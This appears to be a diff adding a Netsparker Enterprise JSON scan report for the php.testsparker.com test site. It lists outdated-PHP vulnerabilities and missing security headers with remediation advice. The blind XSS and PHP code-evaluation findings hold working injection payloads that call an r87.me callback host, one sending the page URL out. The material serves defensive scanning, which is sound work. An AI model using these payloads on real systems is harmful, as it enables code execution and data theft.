"Severity": "High", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Server-Side Request Forgery (SSRF) Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Access Control Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Numeric Errors Vulnerability" + } + ], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Out-of-date Version (PHP)", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    Please upgrade your installation of PHP to the latest stable version.
    ", + "RemedyReferences": "", + "Severity": "Critical", + "State": "Present", + "Type": "PhpOutOfDate", + "Url": "http://php.testsparker.com/" + }, + { + "Certainty": 90, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "103", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "4.3" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "4.1" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "4.1" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "693", + "Hipaa": "", + "Owasp": "A5", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "" + }, + "Confirmed": false, + "Description": "

    Netsparker Enterprise detected a missing X-Frame-Options header which means that this website could be at risk of a clickjacking attack.

    \n

    The X-Frame-Options HTTP header field indicates a policy that specifies whether the browser should render the transmitted resource within a frame or an iframe. Servers can declare this policy in the header of their HTTP responses to prevent clickjacking attacks, which ensures that their content is not embedded into other pages or frames.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Page Type", + "Value": "Other" + } + ], + "FirstSeenDate": "16/06/2021 12:30 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "4f5de955-5e9d-4746-3fc0-ad490209f0e6", + "Impact": "
    \n

    Clickjacking is when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on a framed page when they were intending to click on the top level page. Thus, the attacker is \"hijacking\" clicks meant for their page and routing them to other another page, most likely owned by another application, domain, or both.

    \n

    Using a similar technique, keystrokes can also be hijacked. With a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing in the password to their email or bank account, but are instead typing into an invisible frame controlled by the attacker.

    \n
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Missing X-Frame-Options Header", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    \n
      \n
    • Sending the proper X-Frame-Options in HTTP response headers that instruct the browser to not allow framing from other domains.\n
        \n
      • X-Frame-Options: DENY  It completely denies to be loaded in frame/iframe.
      • \n
      • X-Frame-Options: SAMEORIGIN It allows only if the site which wants to load has a same origin.
      • \n
      • X-Frame-Options: ALLOW-FROM URL It grants a specific URL to load itself in a iframe. However please pay attention to that, not all browsers support this.
      • \n
      \n
    • \n
    • Employing defensive code in the UI to ensure that the current frame is the most top level window.
    • \n
    \n
    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "MissingXFrameOptionsHeader", + "Url": "http://php.testsparker.com/" + }, + { + "Certainty": 90, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "4.3" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "4.1" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "4.1" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "16", + "Hipaa": "164.308(a)", + "Owasp": "", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "15" + }, + "Confirmed": false, + "Description": "

    Netsparker Enterprise detected a missing X-XSS-Protection header which means that this website could be at risk of a Cross-site Scripting (XSS) attacks.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Page Type", + "Value": "Other" + } + ], + "FirstSeenDate": "15/06/2021 05:45 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "f4fdd62e-a869-499f-b70d-ad48032ad260", + "Impact": "
    This issue is reported as additional information only. There is no direct impact arising from this issue.
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Missing X-XSS-Protection Header", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    Add the X-XSS-Protection header with a value of \"1; mode= block\".\n
      \n
    • \n
      X-XSS-Protection: 1; mode=block
      \n
    • \n
    \n
    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "MissingXssProtectionHeader", + "Url": "http://php.testsparker.com/" + }, + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "", + "Cvss": null, + "Cvss31": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "5.7" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "5.5" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "5.5" + }, + "Vector": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C" + }, + "Cwe": "16", + "Hipaa": "", + "Owasp": "", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "15" + }, + "Confirmed": true, + "Description": "

    Cookies are typically sent to third parties in cross origin requests. This can be abused to do CSRF attacks. Recently a new cookie attribute named SameSite was proposed to disable third-party usage for some cookies, to prevent CSRF attacks.

    \n

    Same-site cookies allow servers to mitigate the risk of CSRF and information leakage attacks by asserting that a particular cookie should only be sent with requests initiated from the same registrable domain.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Identified Cookie(s)", + "Value": "PHPSESSID" + }, + { + "Name": "Cookie Source", + "Value": "HTTP Header" + }, + { + "Name": "Page Type", + "Value": "Login" + } + ], + "FirstSeenDate": "16/06/2021 12:30 PM", + "HttpRequest": { + "Content": "GET /auth/login.php HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nReferer: http://php.testsparker.com/auth/\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nSet-Cookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d; path=/\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nContent-Length: 3061\r\nX-Powered-By: PHP/5.2.6\r\nPragma: no-cache\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nKeep-Alive: timeout=5, max=150\r\nConnection: Keep-Alive\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:36 GMT\r\nCache-Control: no-store, must-revalidate, no-cache, post-check=0, pre-check=0\r\n\r\n\n\n\n\n\n\n\nNetsparker Test Web Site - PHP\n\n\n
    \n \n\t
    \n\t\t\n\t
    \n\t\n\t
    \n\n\t
    \n\t\t
    \n\t
    \n\t
    \n\t\t
    \n\t\t\t
    \n\t\t\t\t\t\t\t\t

    Login Area

    \n\t\t\t\t\t

    \n Enter your credentials (admin / admin123456)\n
    \n

    \n Username: \n
    \n Password:  \n\n\n
    \n\t \n
    \n \n
    \n

    \n\n\t\t\t\t
     
    \n\t\t\t\t
    \n\n\n\t\t\t\t
    \n\t\t\t
    \n\t\t
     
    \n\t\t
    \n\t\t\n\t \n\t
    \n\t\t\t
      \n\t\t\t\t
    • \n\t\t\t\t\t
      \n\t\t\t\t\t\t
      \n\t\t\t\t\t\t\t
      \n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t
      \n\t\t\t\t\t\t
      \n\t\t\t\t\n\t\t\t\t\t
      \n\t\t\t\t\t
       
      \n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Tags

      \n\t\t\t\t\t

      netsparker xss web-application-security false-positive-free automated-exploitation sql-injection local/remote-file-inclusion

      \n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Inner Pages

      \n\t\t\t\t\t\n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Links

      \n\t\t\t\t\t\n\t\t\t\t
    • \n\t\t\t\t
    • \n\n\t\t\t
    \n\t\t
    \t\t\n\t\t
     
    \n\t
    \n\t
    \n\t
    \n\t\n
    \nv\n
    \n\t\t

    Copyright (c) 2010 testsparker.com. All rights reserved. Design by Free CSS Templates.

    \n\t
    \t\n\n\n", + "Duration": 41.4849, + "StatusCode": 200 + }, + "LookupId": "68368f54-b163-41d0-430c-ad49020a4d6b", + "Impact": "", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "SameSite Cookie Not Implemented", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "

    The server can set a same-site cookie by adding the SameSite=... attribute to the Set-Cookie header. There are three possible values for the SameSite attribute:

    \n
      \n
    • Lax: In this mode, the cookie will only be sent with a top-level get request.\n
      Set-Cookie: key=value; SameSite=Lax
      \n
    • \n
    • Strict: In this mode, the cookie will not be sent with any cross-site usage even if the user follows a link to another website.\n
      Set-Cookie: key=value; SameSite=Strict
      \n
    • \n
    • None: In this mode, the cookie will be sent with the cross-site requests. Cookies with SameSite=None must also specify the Secure attribute to transfer them via a secure context. Setting a SameSite=None cookie without the Secure attribute will be rejected by the browsers.
      \n
      Set-Cookie: key=value; SameSite=None; Secure
      \n
    • \n
    \n

     

    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "SameSiteCookieNotImplemented", + "Url": "http://php.testsparker.com/auth/login.php" + }, + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "19", + "Cvss": { + "BaseScore": { + "Severity": 3, + "Type": "Base", + "Value": "8.6" + }, + "EnvironmentalScore": { + "Severity": 3, + "Type": "Environmental", + "Value": "8.6" + }, + "TemporalScore": { + "Severity": 3, + "Type": "Temporal", + "Value": "8.6" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" + }, + "Cvss31": { + "BaseScore": { + "Severity": 3, + "Type": "Base", + "Value": "8.6" + }, + "EnvironmentalScore": { + "Severity": 3, + "Type": "Environmental", + "Value": "8.6" + }, + "TemporalScore": { + "Severity": 3, + "Type": "Temporal", + "Value": "8.6" + }, + "Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" + }, + "Cwe": "79", + "Hipaa": "164.308(a)", + "Owasp": "A3", + "OwaspProactiveControls": "", + "Pci32": "6.5.7", + "Wasc": "8" + }, + "Confirmed": true, + "Description": "

    Netsparker Enterprise detected Blind Cross-site Scripting via capturing a triggered DNS A request, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.

    \n

    This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [], + "FirstSeenDate": "16/06/2021 12:38 PM", + "HttpRequest": { + "Content": "GET /artist.php?id=%3ciMg%20src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22%20onload%3d%22this.onload%3d%27%27%3bthis.src%3d%27%2f%2fpbgjnvv2k8sv_nfk8lpxyks_jxy7mrsm1rv6ic0g%27%2b%275ou.r87.me%2fr%2f%3f%27%2blocation.href%22%3e HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nCookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d\r\nReferer: http://php.testsparker.com/process.php?file=Generics/index.nsp\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [ + { + "Name": "id", + "Type": "Querystring", + "Value": "", + "Vulnerable": true + } + ] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 2983\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:51:39 GMT\r\n\r\n", + "Duration": 0.0, + "StatusCode": 0 + }, + "LookupId": "6f963587-2af9-4fac-7b41-ad490211f172", + "Impact": "
    There are many different attacks that can be leveraged through the use of cross-site scripting, including:\n
      \n
    • Hijacking user's active session.
    • \n
    • Mounting phishing attacks.
    • \n
    • Intercepting data and performing man-in-the-middle attacks.
    • \n
    \n
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 02:01 AM", + "Name": "Blind Cross-site Scripting", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    \n

    The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes in to a JavaScript block within the HTML document, then output needs to be encoded accordingly. Encoding can get very complex, therefore it's strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-cross-site scripting.

    \n

    Additionally, you should implement a strong Content Security Policy (CSP) as a defense-in-depth measure if an XSS vulnerability is mistakenly introduced. Due to the complexity of XSS-Prevention and the lack of secure standard behavior in programming languages and frameworks, XSS vulnerabilities are still common in web applications.

    \n

    CSP will act as a safeguard that can prevent an attacker from successfully exploiting Cross-site Scripting vulnerabilities in your website and is advised in any kind of application. Please make sure to scan your application again with Content Security Policy checks enabled after implementing CSP, in order to avoid common mistakes that can impact the effectiveness of your policy. There are a few pitfalls that can render your CSP policy useless and we highly recommend reading the resources linked in the reference section before you start to implement one. 

    \n
    ", + "RemedyReferences": "", + "Severity": "High", + "State": "Revived", + "Type": "BlindXss", + "Url": "http://php.testsparker.com/artist.php?id=%3CiMg%20src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22%20onload%3d%22this.onload%3d%27%27%3bthis.src%3d%27%2f%2fpbgjnvv2k8sv_nfk8lpxyks_jxy7mrsm1rv6ic0g%27%2b%275ou.r87.me%2fr%2f%3f%27%2blocation.href%22%3E" + }, + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "23", + "Cvss": { + "BaseScore": { + "Severity": 4, + "Type": "Base", + "Value": "10.0" + }, + "EnvironmentalScore": { + "Severity": 4, + "Type": "Environmental", + "Value": "10.0" + }, + "TemporalScore": { + "Severity": 4, + "Type": "Temporal", + "Value": "10.0" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + }, + "Cvss31": { + "BaseScore": { + "Severity": 4, + "Type": "Base", + "Value": "10.0" + }, + "EnvironmentalScore": { + "Severity": 4, + "Type": "Environmental", + "Value": "10.0" + }, + "TemporalScore": { + "Severity": 4, + "Type": "Temporal", + "Value": "10.0" + }, + "Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + }, + "Cwe": "94", + "Hipaa": "164.306(a), 164.308(a)", + "Owasp": "A1", + "OwaspProactiveControls": "", + "Pci32": "6.5.1", + "Wasc": "" + }, + "Confirmed": true, + "Description": "

    Netsparker Enterprise identified a Remote Code Evaluation (PHP) by capturing a DNS A request, which occurs when input data is run as code.

    \n

    This is a highly critical issue and should be addressed as soon as possible.

    ", + "ExploitationSkills": "
    This vulnerability is not difficult to leverage. PHP is a high level language for which there are vast resources available. Successful exploitation requires knowledge of the programming language, access to the source code or the ability to produce source code for use in such attacks, and minimal attack skills.
    ", + "ExternalReferences": "", + "ExtraInformation": [], + "FirstSeenDate": "16/06/2021 12:38 PM", + "HttpRequest": { + "Content": "GET /hello.php?name=%2bgethostbyname(trim(%27pbgjnvv2k8amvntlvrb4nfp0wti6jxm92k1h8ehc%27.%276ii.r87.me%27))%3b%2f%2f HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nCookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d\r\nReferer: http://php.testsparker.com/process.php\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [ + { + "Name": "name", + "Type": "Querystring", + "Value": "+gethostbyname(trim('pbgjnvv2k8amvntlvrb4nfp0wti6jxm92k1h8ehc'.'6ii.r87.me'));//", + "Vulnerable": true + } + ] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 2770\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:50:36 GMT\r\n\r\n", + "Duration": 0.0, + "StatusCode": 0 + }, + "LookupId": "c7139765-b9c1-494c-7b46-ad490211f1ab", + "Impact": "
    An attacker can execute arbitrary PHP code on the system. The attacker may also be able to execute arbitrary system commands.
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 02:01 AM", + "Name": "Out of Band Code Evaluation (PHP)", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    Do not accept input from end users that will be directly interpreted as source code. If this is a business requirement, validate all the input on the application and remove all the data that could be directly interpreted as PHP source code.
    ", + "RemedyReferences": "", + "Severity": "Critical", + "State": "Revived", + "Type": "OutOfBandRcePhp", + "Url": "http://php.testsparker.com/hello.php?name=%2bgethostbyname(trim(%27pbgjnvv2k8amvntlvrb4nfp0wti6jxm92k1h8ehc%27.%276ii.r87.me%27))%3b%2f%2f" + }, + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "4.3" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "4.8" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "4.1" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N/E:H/RL:O/RC:C/CR:H/IR:H/AR:H" + }, + "Cvss31": null, + "Cwe": "16", + "Hipaa": "", + "Owasp": "", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "15" + }, + "Confirmed": false, + "Description": "

    CSP is an added layer of security that helps to mitigate mainly Cross-site Scripting attacks.

    \n

    CSP can be enabled instructing the browser with a Content-Security-Policy directive in a response header;

    \n
     Content-Security-Policy: script-src 'self';
    \n

    or in a meta tag;

    \n
    <meta http-equiv=\"Content-Security-Policy\" content=\"script-src 'self';\"> 
    \n

    In the above example, you can restrict script loading only to the same domain. It will also restrict inline script executions both in the element attributes and the event handlers. There are various directives which you can use by declaring CSP:

    \n
      \n
    • script-src: Restricts the script loading resources to the ones you declared. By default, it disables inline script executions unless you permit to the evaluation functions and inline scripts by the unsafe-eval and unsafe-inline keywords.
    • \n
    • base-uri: Base element is used to resolve relative URL to absolute one. By using this CSP directive, you can define all possible URLs which could be assigned to base-href attribute of the document.
    • \n
    • frame-ancestors: It is very similar to X-Frame-Options HTTP header. It defines the URLs by which the page can be loaded in an iframe.
    • \n
    • frame-src / child-src: frame-src is the deprecated version of child-src. Both define the sources that can be loaded by iframe in the page. (Please note that frame-src was brought back in CSP 3)
    • \n
    • object-src : Defines the resources that can be loaded by embedding such as Flash files, Java Applets.
    • \n
    • img-src: As its name implies, it defines the resources where the images can be loaded from.
    • \n
    • connect-src: Defines the whitelisted targets for XMLHttpRequest and WebSocket objects.
    • \n
    • default-src: It is a fallback for the directives that mostly ends with -src suffix. When the directives below are not defined, the value set to default-src will be used instead:\n
        \n
      • child-src
      • \n
      • connect-src
      • \n
      • font-src
      • \n
      • img-src
      • \n
      • manifest-src
      • \n
      • media-src
      • \n
      • object-src
      • \n
      • script-src
      • \n
      • style-src
      • \n
      \n
    • \n
    \n

    When setting the CSP directives, you can also use some CSP keywords:

    \n
      \n
    • none: Denies loading resources from anywhere.
    • \n
    • self : Points to the document's URL (domain + port).
    • \n
    • unsafe-inline: Permits running inline scripts.
    • \n
    • unsafe-eval: Permits execution of evaluation functions such as eval().
    • \n
    \n

    In addition to CSP keywords, you can also use wildcard or only a scheme when defining whitelist URLs for the points. Wildcard can be used for subdomain and port portions of the URLs:

    \n
    Content-Security-Policy: script-src https://*.example.com;
    \n
    Content-Security-Policy: script-src https://example.com:*;
    \n
    Content-Security-Policy: script-src https:;
    \n

    It is also possible to set a CSP in Report-Only mode instead of forcing it immediately in the migration period. Thus you can see the violations of the CSP policy in the current state of your web site while migrating to CSP:

    \n
    Content-Security-Policy-Report-Only: script-src 'self'; report-uri: https://example.com;
    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Page Type", + "Value": "Other" + } + ], + "FirstSeenDate": "16/06/2021 12:30 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "e172ace9-3b52-43f6-3fca-ad490209f280", + "Impact": "

    There is no direct impact of not implementing CSP on your website. However, if your website is vulnerable to a Cross-site Scripting attack CSP can prevent successful exploitation of that vulnerability. By not implementing CSP you’ll be missing out this extra layer of security.

    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Content Security Policy (CSP) Not Implemented", + "ProofOfConcept": "", + "RemedialActions": "
      \n
    • Enable CSP on your website by sending the Content-Security-Policy in HTTP response headers that instruct the browser to apply the policies you specified.
    • \n
    • Apply the whitelist and policies as strict as possible.
    • \n
    • Rescan your application to see if Netsparker Enterprise identifies any weaknesses in your policies.
    • \n
    ", + "RemedialProcedure": "

    Enable CSP on your website by sending the Content-Security-Policy in HTTP response headers that instruct the browser to apply the policies you specified.

